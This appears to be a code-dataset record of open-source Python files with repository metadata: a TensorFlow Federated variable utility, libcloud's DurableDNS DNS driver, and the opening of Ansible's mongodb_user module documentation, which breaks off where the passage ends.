"path": "ibm_mq/datadog_checks/ibm_mq/errors.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "578"
},
{
"name": "COBOL",
"bytes": "12312"
},
{
"name": "Dockerfile",
"bytes": "22998"
},
{
"name": "Erlang",
"bytes": "15518"
},
{
"name": "Go",
"bytes": "6988"
},
{
"name": "HCL",
"bytes": "4080"
},
{
"name": "HTML",
"bytes": "1318"
},
{
"name": "JavaScript",
"bytes": "1817"
},
{
"name": "Kotlin",
"bytes": "430"
},
{
"name": "Lua",
"bytes": "3489"
},
{
"name": "PHP",
"bytes": "20"
},
{
"name": "PowerShell",
"bytes": "2398"
},
{
"name": "Python",
"bytes": "13020828"
},
{
"name": "Roff",
"bytes": "359"
},
{
"name": "Ruby",
"bytes": "241"
},
{
"name": "Scala",
"bytes": "7000"
},
{
"name": "Shell",
"bytes": "83227"
},
{
"name": "Swift",
"bytes": "203"
},
{
"name": "TSQL",
"bytes": "29972"
},
{
"name": "TypeScript",
"bytes": "1019"
}
],
"symlink_target": ""
}
|
"""Library of helper functions for working with TensorFlow `tf.Variable`."""
import contextlib
import operator
import numpy as np
import tensorflow as tf
@contextlib.contextmanager
def record_variable_creation_scope():
  """Single-use context manager that records variable creation calls.

  Yields a list that grows (in creation order) with every `tf.Variable`
  created while the scope is active.
  """
  created = []

  def _recording_creator(next_creator, **kwargs):
    new_variable = next_creator(**kwargs)
    created.append(new_variable)
    return new_variable

  with tf.variable_creator_scope(_recording_creator):
    yield created
class TensorVariable:
  """A class that is duck-typed to `tf.Variable` but only uses `tf.Tensor`.

  This class implements the interface contract of `tf.Variable`, for
  documentation see http://www.tensorflow.org/api_docs/python/tf/Variable. To
  be true to the API sometimes arguments are ignored (e.g. `use_locking`).

  This is intended for creating `tff.learning.models.FunctionalModel` and is
  *not* compatible with `tf.distribute` strategies.

  IMPORTANT: this class behaves as if
  `tf.autograph.experimental.Feature.AUTO_CONTROL_DEPS` (ACD) was applied, which
  is the same behavior as inside a `tf.function`. This may have surprising
  side-effects if code authors were not expecting it, but also is more similar
  to standard Python code where the line ordering implies execution ordering.

  IMPORTANT: the `name` attribute does not behave the same as `tf.Variable`.
  Notably, it does not do name deduplication in graph contexts (no `_#` suffix
  is applied), and the returned name string does not refer to the fetchable
  resource from a session.
  """

  def __init__(self,
               initial_value,
               dtype=None,
               validate_shape=True,
               shape=None,
               **kwargs):
    """For details see https://www.tensorflow.org/api_docs/python/tf/Variable#args_1."""
    # A callable initial value is invoked immediately; `dtype` is required in
    # that case because it cannot be inferred before the call.
    if callable(initial_value):
      if dtype is None:
        raise ValueError('When `initial_value` is a callable, `dtype` must be '
                         'specified.')
      initial_value = initial_value()
    if tf.is_tensor(initial_value):
      self._initial_value = initial_value
    else:
      if dtype is not None:
        self._initial_value = tf.convert_to_tensor(initial_value, dtype)
      else:
        self._initial_value = tf.convert_to_tensor(initial_value)
    # The "variable" is just a tensor that gets replaced on each assignment.
    self._tensor = self._initial_value
    self._validate_shape = validate_shape
    if shape is None:
      self._shape = self._initial_value.shape
    else:
      if not isinstance(shape, tf.TensorShape):
        shape = tf.TensorShape(shape)
      self._shape = shape
    self._check_shape(self._tensor)
    self._name = kwargs.get('name', 'Variable')
    self._save_slice_info = None

  @property
  def shape(self) -> tf.TensorShape:
    # NOTE(review): returns the current tensor's shape, not the declared
    # `self._shape` (which may be partially defined) -- confirm intended.
    return self._tensor.shape

  @property
  def dtype(self) -> tf.dtypes.DType:
    return self._tensor.dtype

  @property
  def name(self) -> str:
    # See the class docstring: no graph-mode name deduplication is applied.
    return self._name

  def assign(self, value, use_locking=False, name=None, read_value=True):
    """Replace the current value with `value` (after shape validation)."""
    del use_locking  # Unused.
    value = tf.convert_to_tensor(value)
    self._check_shape(value)
    self._tensor = value
    # Mirror tf.Variable: eager callers may skip materializing a read.
    if tf.executing_eagerly() and not read_value:
      return None
    else:
      return tf.identity(self._tensor, name)

  def _check_shape(self, value):
    """Raise ValueError if `value` is incompatible with the declared shape."""
    if not self._validate_shape:
      return
    if not self._shape.is_compatible_with(tf.TensorShape(value.shape)):
      raise ValueError(
          f'Cannot assign value to variable {self!r}. The TensorVariable shape '
          f'{self._shape}, and the value shape {value.shape} are incompatible.')

  def assign_add(self, value, use_locking=False, name=None, read_value=True):
    """Add `value` to the current value in place (functionally)."""
    del use_locking  # Unused.
    value = tf.convert_to_tensor(value)
    self._check_shape(value)
    self._tensor = tf.math.add(self._tensor, value, name=name)
    if tf.executing_eagerly() and not read_value:
      return None
    else:
      return self._tensor

  def assign_sub(self, value, use_locking=False, name=None, read_value=True):
    """Subtract `value` from the current value in place (functionally)."""
    del use_locking  # Unused.
    value = tf.convert_to_tensor(value)
    self._check_shape(value)
    self._tensor = tf.math.subtract(self._tensor, value, name=name)
    if tf.executing_eagerly() and not read_value:
      return None
    else:
      return self._tensor

  def get_shape(self):
    return self._tensor.shape

  def read_value(self):
    return self._tensor

  def value(self):
    return self._tensor

  def ref(self):
    # Hashable reference, mirroring tf.Tensor.ref()/tf.Variable.ref().
    return self._tensor.ref()

  # --- Operator protocol: all arithmetic/comparison dunders simply delegate
  # --- to the wrapped tensor's current value.

  def __abs__(self):
    return operator.__abs__(self._tensor)

  def __add__(self, value):
    return operator.__add__(self._tensor, value)

  def __sub__(self, value):
    return operator.__sub__(self._tensor, value)

  def __eq__(self, value):
    return operator.__eq__(self._tensor, value)

  def __ne__(self, value):
    return operator.__ne__(self._tensor, value)

  def __ge__(self, value):
    return operator.__ge__(self._tensor, value)

  def __gt__(self, value):
    return operator.__gt__(self._tensor, value)

  def __le__(self, value):
    return operator.__le__(self._tensor, value)

  def __lt__(self, value):
    return operator.__lt__(self._tensor, value)

  def __getitem__(self, slice_spec):
    return self._tensor[slice_spec]

  def __invert__(self):
    return operator.__invert__(self._tensor)

  def __mul__(self, value):
    return operator.__mul__(self._tensor, value)

  def __neg__(self):
    return operator.__neg__(self._tensor)

  def __truediv__(self, value):
    return operator.__truediv__(self._tensor, value)

  def __floordiv__(self, value):
    return operator.__floordiv__(self._tensor, value)

  def __pow__(self, value):
    return operator.__pow__(self._tensor, value)

  def __hash__(self):
    # Mirror tf.Variable: hashable only in graph contexts; eager callers
    # must use .ref() as a dict/set key.
    if not tf.executing_eagerly():
      return hash(self._tensor)
    else:
      raise TypeError(f'TensorVariable {self!r} is unhashable. Instead, use '
                      'tensorvariable.ref() as the key.')

  def __repr__(self) -> str:
    return f'<TensorVariable: {self._tensor}>'

  def __array__(self):
    # numpy interop: np.array(tensor_variable) works.
    return np.array(self._tensor)

  # _save_slice_info is an internal implementation detail of old style
  # tf.compat.v1.get_variable() creation and should not generally be used.
  def _set_save_slice_info(self, save_slice_info):
    self._save_slice_info = save_slice_info

  def _get_save_slice_info(self):
    return self._save_slice_info
def create_tensor_variable(next_creator_fn, **kwargs):
  """Variable creator that builds a `TensorVariable` instead of a `tf.Variable`.

  Intended for `tf.variable_creator_scope`; `next_creator_fn` is ignored
  because the creation chain intentionally stops here.
  """
  del next_creator_fn  # Unused.
  return TensorVariable(kwargs.pop('initial_value'), **kwargs)
def _convert_tensor_variable_to_tensor(value, *args, **kwargs):
del args # unused
del kwargs # unused
return value.read_value()
# Let TensorFlow APIs accept a TensorVariable wherever a tensor is expected,
# by converting it to its current value.
tf.register_tensor_conversion_function(TensorVariable,
                                       _convert_tensor_variable_to_tensor)
|
{
"content_hash": "64d79346718d6a1f8696f31ff399ef08",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 88,
"avg_line_length": 31.116591928251122,
"alnum_prop": 0.6620550511601095,
"repo_name": "tensorflow/federated",
"id": "641c6e4084971720c8b9f3870bbab560f523884a",
"size": "7538",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tensorflow_federated/python/tensorflow_libs/variable_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "729470"
},
{
"name": "Dockerfile",
"bytes": "1983"
},
{
"name": "Python",
"bytes": "6700736"
},
{
"name": "Shell",
"bytes": "7123"
},
{
"name": "Starlark",
"bytes": "387382"
}
],
"symlink_target": ""
}
|
"""
DurableDNS Driver
"""
import sys
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import ensure_string
from libcloud.dns.types import Provider, RecordType
from libcloud.dns.base import Record, Zone
from libcloud.dns.base import DNSDriver
from libcloud.dns.types import ZoneDoesNotExistError, ZoneAlreadyExistsError
from libcloud.dns.types import RecordDoesNotExistError
from xml.etree.ElementTree import tostring
from libcloud.common.durabledns import DurableConnection, DurableResponse
from libcloud.common.durabledns import DurableDNSException
from libcloud.common.durabledns import _schema_builder as api_schema_builder
from libcloud.common.durabledns import SCHEMA_BUILDER_MAP
__all__ = [
    'ZONE_EXTRA_PARAMS_DEFAULT_VALUES',
    'RECORD_EXTRA_PARAMS_DEFAULT_VALUES',
    'DEFAULT_TTL',
    'DurableDNSResponse',
    'DurableDNSConnection',
    'DurableDNSDriver'
]

# Default values used for each zone 'extra' attribute the caller does not
# specify explicitly.
ZONE_EXTRA_PARAMS_DEFAULT_VALUES = {
    'ns': 'ns1.durabledns.com.', 'mbox': 'support.durabledns.com',
    'refresh': '28800', 'retry': 7200, 'expire': 604800, 'minimum': 82000,
    'xfer': '', 'update_acl': ''
}

# Default values used for each record 'extra' attribute the caller does not
# specify explicitly.
RECORD_EXTRA_PARAMS_DEFAULT_VALUES = {'aux': 0, 'ttl': 3600}

# Fallback TTL in seconds, applied when the caller passes ttl=None.
DEFAULT_TTL = 3600
class DurableDNSResponse(DurableResponse):
    # No DNS-specific handling needed beyond the shared DurableDNS
    # response parsing.
    pass
class DurableDNSConnection(DurableConnection):
    # Use the DNS-flavored response class for all requests.
    responseCls = DurableDNSResponse
class DurableDNSDriver(DNSDriver):
type = Provider.DURABLEDNS
name = 'DurableDNS'
website = 'https://durabledns.com'
connectionCls = DurableDNSConnection
RECORD_TYPE_MAP = {
RecordType.A: 'A',
RecordType.AAAA: 'AAAA',
RecordType.CNAME: 'CNAME',
RecordType.HINFO: 'HINFO',
RecordType.MX: 'MX',
RecordType.NS: 'NS',
RecordType.PTR: 'PTR',
RecordType.RP: 'RP',
RecordType.SRV: 'SRV',
RecordType.TXT: 'TXT'
}
def list_zones(self):
"""
Return a list of zones.
:return: ``list`` of :class:`Zone`
"""
schema_params = SCHEMA_BUILDER_MAP.get('list_zones')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/listZones.php'
params = {}
headers = {"SOAPAction": "urn:listZoneswsdl#listZones"}
response = self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
# listZones method doens't return full data in zones as getZone
# method does.
zones = []
for data in response.objects:
zone = self.get_zone(data.get('id'))
zones.append(zone)
return zones
def list_records(self, zone):
"""
Return a list of records for the provided zone.
:param zone: Zone to list records for.
:type zone: :class:`Zone`
:return: ``list`` of :class:`Record`
"""
schema_params = SCHEMA_BUILDER_MAP.get('list_records')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone.id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/listRecords.php?'
params = {}
headers = {"SOAPAction": "urn:listRecordswsdl#listRecords"}
try:
response = self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
# listRecords method doens't return full data in records as getRecord
# method does.
records = []
for data in response.objects:
record = self.get_record(zone.id, data.get('id'))
records.append(record)
return records
def get_zone(self, zone_id):
"""
Return a Zone instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:rtype: :class:`Zone`
"""
schema_params = SCHEMA_BUILDER_MAP.get('get_zone')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone_id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/getZone.php?'
params = {}
headers = {"SOAPAction": "urn:getZonewsdl#getZone"}
try:
response = self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone_id, driver=self,
value=e.message)
raise e
zones = self._to_zones(response.objects)
return zones[0]
def get_record(self, zone_id, record_id):
"""
Return a Record instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:param record_id: ID of the required record
:type record_id: ``str``
:rtype: :class:`Record`
"""
schema_params = SCHEMA_BUILDER_MAP.get('get_record')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone_id, 'recordid': record_id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/getRecord.php?'
params = {}
headers = {"SOAPAction": "urn:getRecordwsdl#getRecord"}
try:
response = self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone_id, driver=self,
value=e.message)
if 'Record does not exist' in e.message:
raise RecordDoesNotExistError(record_id=record_id, driver=self,
value=e.message)
raise e
zone = self.get_zone(zone_id)
record = self._to_record(response.objects[0], zone)
return record
def create_zone(self, domain, type='master', ttl=None, extra=None):
"""
Create a new zone.
:param domain: Name of zone, followed by a dot (.) (e.g. example.com.)
:type domain: ``str``
:param type: Zone type (Only master available). (optional)
:type type: ``str``
:param ttl: TTL for new records. (optional)
:type ttl: ``int``
:param extra: Extra attributes ('mbox', 'ns', 'minimum', 'refresh',
'expire', 'update_acl', 'xfer').
(optional)
:type extra: ``dict``
:rtype: :class:`Zone`
"""
if extra is None:
extra = ZONE_EXTRA_PARAMS_DEFAULT_VALUES
else:
extra_fields = ZONE_EXTRA_PARAMS_DEFAULT_VALUES.keys()
missing = set(extra_fields).difference(set(extra.keys()))
for field in missing:
extra[field] = ZONE_EXTRA_PARAMS_DEFAULT_VALUES.get(field)
schema_params = SCHEMA_BUILDER_MAP.get('create_zone')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': domain, 'ttl': ttl or DEFAULT_TTL}
params.update(extra)
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
if isinstance(params.get(key), int):
child.text = "%d"
else:
child.text = "%s"
# We can't insert values directly in child.text because API raises
# and exception for values that need to be integers. And tostring
# method from ElementTree can't handle int values.
skel = ensure_string(tostring(schema)) # Deal with PY3
req_data = skel % (self.key, self.secret, domain, extra.get('ns'),
extra.get('mbox'), extra.get('refresh'),
extra.get('retry'), extra.get('expire'),
extra.get('minimum'), ttl or DEFAULT_TTL,
extra.get('xfer'), extra.get('update_acl'))
action = '/services/dns/createZone.php?'
params = {}
headers = {"SOAPAction": "urn:createZonewsdl#createZone"}
try:
self.connection.request(action=action, params=params,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone Already Exist' in e.message:
raise ZoneAlreadyExistsError(zone_id=domain, driver=self,
value=e.message)
raise e
zone = self.get_zone(domain)
return zone
def create_record(self, name, zone, type, data, extra=None):
"""
Create a new record.
:param name: Record name without the domain name (e.g. www).
Note: If you want to create a record for a base domain
name, you should specify empty string ('') for this
argument.
:type name: ``str``
:param zone: Zone where the requested record is created.
:type zone: :class:`Zone`
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: Extra attributes (e.g. 'aux', 'ttl'). (optional)
:type extra: ``dict``
:rtype: :class:`Record`
"""
if extra is None:
extra = RECORD_EXTRA_PARAMS_DEFAULT_VALUES
else:
if 'aux' not in extra:
extra['aux'] = RECORD_EXTRA_PARAMS_DEFAULT_VALUES.get('aux')
if 'ttl' not in extra:
extra['ttl'] = RECORD_EXTRA_PARAMS_DEFAULT_VALUES.get('ttl')
extra['ddns_enabled'] = 'N'
schema_params = SCHEMA_BUILDER_MAP.get('create_record')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone.id, 'name': name, 'type': type,
'data': data}
params.update(extra)
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
if isinstance(params.get(key), int):
child.text = "%d"
else:
child.text = "%s"
# We can't insert values directly in child.text because API raises
# and exception for values that need to be integers. And tostring
# method from ElementTree can't handle int values.
skel = ensure_string(tostring(schema)) # Deal with PY3
req_data = skel % (self.key, self.secret, zone.id, name, type, data,
extra.get('aux'), extra.get('ttl'),
extra.get('ddns_enabled'))
action = '/services/dns/createRecord.php?'
headers = {"SOAPAction": "urn:createRecordwsdl#createRecord"}
try:
response = self.connection.request(action=action, data=req_data,
method="POST", headers=headers)
objects = response.objects
except DurableDNSException:
e = sys.exc_info()[1]
# In DurableDNS is possible to create records with same data.
# Their ID's will be different but the API does not implement
# the RecordAlreadyExist exception. Only ZoneDoesNotExist will
# be handled.
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
record_item = objects[0]
record_item['name'] = name
record_item['type'] = type
record_item['data'] = data
record_item['ttl'] = extra.get('ttl')
record_item['aux'] = extra.get('aux')
record = self._to_record(record_item, zone)
return record
def update_zone(self, zone, domain, type='master', ttl=None, extra=None):
"""
Update en existing zone.
:param zone: Zone to update.
:type zone: :class:`Zone`
:param domain: Name of zone, followed by a dot (.) (e.g. example.com.)
:type domain: ``str``
:param type: Zone type (master / slave).
:type type: ``str``
:param ttl: TTL for new records. (optional)
:type ttl: ``int``
:param extra: Extra attributes ('ns', 'mbox', 'refresh', 'retry',
'expire', 'minimum', 'xfer', 'update_acl'). (optional)
:type extra: ``dict``
:rtype: :class:`Zone`
"""
if ttl is None:
ttl = zone.ttl
if extra is None:
extra = zone.extra
else:
extra_fields = ZONE_EXTRA_PARAMS_DEFAULT_VALUES.keys()
missing = set(extra_fields).difference(set(extra.keys()))
for field in missing:
extra[field] = zone.extra.get(field)
schema_params = SCHEMA_BUILDER_MAP.get('update_zone')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': domain, 'ttl': ttl}
params.update(extra)
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
if isinstance(params.get(key), int):
child.text = "%d"
else:
child.text = "%s"
# We can't insert values directly in child.text because API raises
# and exception for values that need to be integers. And tostring
# method from ElementTree can't handle int values.
skel = ensure_string(tostring(schema)) # Deal with PY3
req_data = skel % (self.key, self.secret, domain, extra['ns'],
extra['mbox'], extra['refresh'], extra['retry'],
extra['expire'], extra['minimum'], ttl,
extra['xfer'], extra['update_acl'])
action = '/services/dns/updateZone.php?'
headers = {"SOAPAction": "urn:updateZonewsdl#updateZone"}
try:
self.connection.request(action=action,
data=req_data,
method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
# After update the zone, serial number change. In order to have it
# updated, we need to get again the zone data.
zone = self.get_zone(zone.id)
return zone
def update_record(self, record, name, type, data, extra=None):
"""
Update an existing record.
:param record: Record to update.
:type record: :class:`Record`
:param name: Record name without the domain name (e.g. www).
Note: If you want to create a record for a base domain
name, you should specify empty string ('') for this
argument.
:type name: ``str``
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: :class:`Record`
"""
zone = record.zone
if extra is None:
extra = record.extra
else:
extra_fields = ['aux', 'ttl']
missing = set(extra_fields).difference(set(extra.keys()))
for field in missing:
extra[field] = record.extra.get(field)
extra['ddns_enabled'] = 'N'
schema_params = SCHEMA_BUILDER_MAP.get('update_record')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone.id, 'id': record.id, 'name': name,
'data': data}
params.update(extra)
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
if isinstance(params.get(key), int):
child.text = "%d"
else:
child.text = "%s"
# We can't insert values directly in child.text because API raises
# and exception for values that need to be integers. And tostring
# method from ElementTree can't handle int values.
skel = ensure_string(tostring(schema)) # Deal with PY3
req_data = skel % (self.key, self.secret, zone.id, record.id, name,
extra.get('aux'), data, extra.get('ttl'),
extra.get('ddns_enabled'))
action = '/services/dns/updateRecord.php?'
headers = {"SOAPAction": "urn:updateRecordwsdl#updateRecord"}
try:
self.connection.request(action=action,
data=req_data,
method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
record_item = {}
record_item['id'] = record.id
record_item['name'] = name
record_item['type'] = type
record_item['data'] = data
record_item['ttl'] = extra.get('ttl')
record_item['aux'] = extra.get('aux')
record = self._to_record(record_item, zone)
return record
def delete_zone(self, zone):
"""
Delete a zone.
Note: This will delete all the records belonging to this zone.
:param zone: Zone to delete.
:type zone: :class:`Zone`
:rtype: ``bool``
"""
schema_params = SCHEMA_BUILDER_MAP.get('delete_zone')
attributes = schema_params.get('attributes')
schema = api_schema_builder(schema_params.get('urn_nid'),
schema_params.get('method'),
attributes)
params = {'apiuser': self.key, 'apikey': self.secret,
'zonename': zone.id}
urn = schema.getchildren()[0]
for child in urn:
key = child.tag.split(':')[2]
if key in attributes:
child.text = str(params.get(key))
req_data = tostring(schema)
action = '/services/dns/deleteZone.php?'
headers = {"SOAPAction": "urn:deleteZonewsdl#deleteZone"}
try:
response = self.connection.request(action=action,
data=req_data, method="POST",
headers=headers)
except DurableDNSException:
e = sys.exc_info()[1]
if 'Zone does not exist' in e.message:
raise ZoneDoesNotExistError(zone_id=zone.id, driver=self,
value=e.message)
raise e
return response.status in [httplib.OK]
def delete_record(self, record):
    """
    Delete a single DNS record.

    :param record: Record to delete.
    :type  record: :class:`Record`

    :rtype: ``bool``
    """
    builder_conf = SCHEMA_BUILDER_MAP.get('delete_record')
    wanted = builder_conf.get('attributes')
    envelope = api_schema_builder(builder_conf.get('urn_nid'),
                                  builder_conf.get('method'),
                                  wanted)
    values = {'apiuser': self.key, 'apikey': self.secret,
              'zonename': record.zone.id, 'id': record.id}
    # Fill each attribute element of the urn node with its value.
    for node in envelope.getchildren()[0]:
        tag_name = node.tag.split(':')[2]
        if tag_name in wanted:
            node.text = str(values.get(tag_name))
    payload = tostring(envelope)
    try:
        response = self.connection.request(
            action='/services/dns/deleteRecord.php?',
            data=payload,
            headers={'SOAPAction': 'urn:deleteRecordwsdl#deleteRecord'},
            method='POST')
    except DurableDNSException:
        e = sys.exc_info()[1]
        # The API misspells "exists" here; match its exact wording.
        if 'Record does not exists' in e.message:
            raise RecordDoesNotExistError(record_id=record.id, driver=self,
                                          value=e.message)
        if 'Zone does not exist' in e.message:
            raise ZoneDoesNotExistError(zone_id=record.zone.id,
                                        driver=self, value=e.message)
        raise e
    return response.status in [httplib.OK]
def _to_zone(self, item):
    # DurableDNS does not report a zone type, so every zone is
    # labelled 'master'. The zone name doubles as its id.
    return Zone(id=item.get('id'), type='master',
                domain=item.get('id'), ttl=item.get('ttl'),
                driver=self, extra=item.get('extra'))
def _to_zones(self, items):
    """Convert a list of API zone dicts into :class:`Zone` objects."""
    return [self._to_zone(entry) for entry in items]
def _to_record(self, item, zone=None):
    # 'aux' and 'ttl' are normalised to int inside extra, while the
    # Record's own ttl keeps the raw value from the API response.
    meta = {'aux': int(item.get('aux')), 'ttl': int(item.get('ttl'))}
    return Record(id=item.get('id'), type=item.get('type'), zone=zone,
                  name=item.get('name'), data=item.get('data'),
                  driver=self, ttl=item.get('ttl', None), extra=meta)
def _to_records(self, items, zone=None):
    """Convert a list of API record dicts into :class:`Record` objects."""
    return [self._to_record(entry, zone) for entry in items]
|
{
"content_hash": "9b528a2d8166fda87ca97184106d06c4",
"timestamp": "",
"source": "github",
"line_count": 646,
"max_line_length": 79,
"avg_line_length": 39.907120743034056,
"alnum_prop": 0.5264158262218774,
"repo_name": "wido/libcloud",
"id": "5d2fbe81d1af26fb4d4d665394f5932bc94392ac",
"size": "26561",
"binary": false,
"copies": "4",
"ref": "refs/heads/trunk",
"path": "libcloud/dns/drivers/durabledns.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2545"
},
{
"name": "Python",
"bytes": "4512215"
},
{
"name": "Shell",
"bytes": "13868"
}
],
"symlink_target": ""
}
|
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: mongodb_user
short_description: Adds or removes a user from a MongoDB database.
description:
- Adds or removes a user from a MongoDB database.
version_added: "1.1"
options:
login_user:
description:
- The username used to authenticate with
required: false
default: null
login_password:
description:
- The password used to authenticate with
required: false
default: null
login_host:
description:
- The host running the database
required: false
default: localhost
login_port:
description:
- The port to connect to
required: false
default: 27017
login_database:
version_added: "2.0"
description:
- The database where login credentials are stored
required: false
default: null
replica_set:
version_added: "1.6"
description:
- Replica set to connect to (automatically connects to primary for writes)
required: false
default: null
database:
description:
- The name of the database to add/remove the user from
required: true
name:
description:
- The name of the user to add or remove
required: true
default: null
aliases: [ 'user' ]
password:
description:
- The password to use for the user
required: false
default: null
ssl:
version_added: "1.8"
description:
- Whether to use an SSL connection when connecting to the database
default: False
ssl_cert_reqs:
version_added: "2.2"
description:
- Specifies whether a certificate is required from the other side of the connection, and whether it will be validated if provided.
required: false
default: "CERT_REQUIRED"
choices: ["CERT_REQUIRED", "CERT_OPTIONAL", "CERT_NONE"]
roles:
version_added: "1.3"
description:
- "The database user roles valid values could either be one or more of the following strings: 'read', 'readWrite', 'dbAdmin', 'userAdmin', 'clusterAdmin', 'readAnyDatabase', 'readWriteAnyDatabase', 'userAdminAnyDatabase', 'dbAdminAnyDatabase'"
- "Or the following dictionary '{ db: DATABASE_NAME, role: ROLE_NAME }'."
- "This param requires pymongo 2.5+. If it is a string, mongodb 2.4+ is also required. If it is a dictionary, mongo 2.6+ is required."
required: false
default: "readWrite"
  state:
    description:
      - The database user state
    required: false
    default: present
    choices: [ "present", "absent" ]
update_password:
required: false
default: always
choices: ['always', 'on_create']
version_added: "2.1"
description:
- C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users.
notes:
- Requires the pymongo Python package on the remote host, version 2.4.2+. This
can be installed using pip or the OS package manager. @see http://api.mongodb.org/python/current/installation.html
requirements: [ "pymongo" ]
author: "Elliott Foster (@elliotttf)"
'''
EXAMPLES = '''
# Create 'burgers' database user with name 'bob' and password '12345'.
- mongodb_user:
database: burgers
name: bob
password: 12345
state: present
# Create a database user via SSL (MongoDB must be compiled with the SSL option and configured properly)
- mongodb_user:
database: burgers
name: bob
password: 12345
state: present
ssl: True
# Delete 'burgers' database user with name 'bob'.
- mongodb_user:
database: burgers
name: bob
state: absent
# Define more users with various specific roles (if not defined, no roles is assigned, and the user will be added via pre mongo 2.2 style)
- mongodb_user:
database: burgers
name: ben
password: 12345
roles: read
state: present
- mongodb_user:
database: burgers
name: jim
password: 12345
roles: readWrite,dbAdmin,userAdmin
state: present
- mongodb_user:
database: burgers
name: joe
password: 12345
roles: readWriteAnyDatabase
state: present
# add a user to database in a replica set, the primary server is automatically discovered and written to
- mongodb_user:
database: burgers
name: bob
replica_set: belcher
password: 12345
roles: readWriteAnyDatabase
state: present
# add a user 'oplog_reader' with read only access to the 'local' database on the replica_set 'belcher'. This is usefull for oplog access (MONGO_OPLOG_URL).
# please notice the credentials must be added to the 'admin' database because the 'local' database is not syncronized and can't receive user credentials
# To login with such user, the connection string should be MONGO_OPLOG_URL="mongodb://oplog_reader:oplog_reader_password@server1,server2/local?authSource=admin"
# This syntax requires mongodb 2.6+ and pymongo 2.5+
- mongodb_user:
login_user: root
login_password: root_password
database: admin
user: oplog_reader
password: oplog_reader_password
state: present
replica_set: belcher
roles:
- db: local
role: read
'''
import ssl as ssl_lib
import ConfigParser
from distutils.version import LooseVersion
try:
from pymongo.errors import ConnectionFailure
from pymongo.errors import OperationFailure
from pymongo import version as PyMongoVersion
from pymongo import MongoClient
except ImportError:
try: # for older PyMongo 2.2
from pymongo import Connection as MongoClient
except ImportError:
pymongo_found = False
else:
pymongo_found = True
else:
pymongo_found = True
# =========================================
# MongoDB module specific support methods.
#
def check_compatibility(module, client):
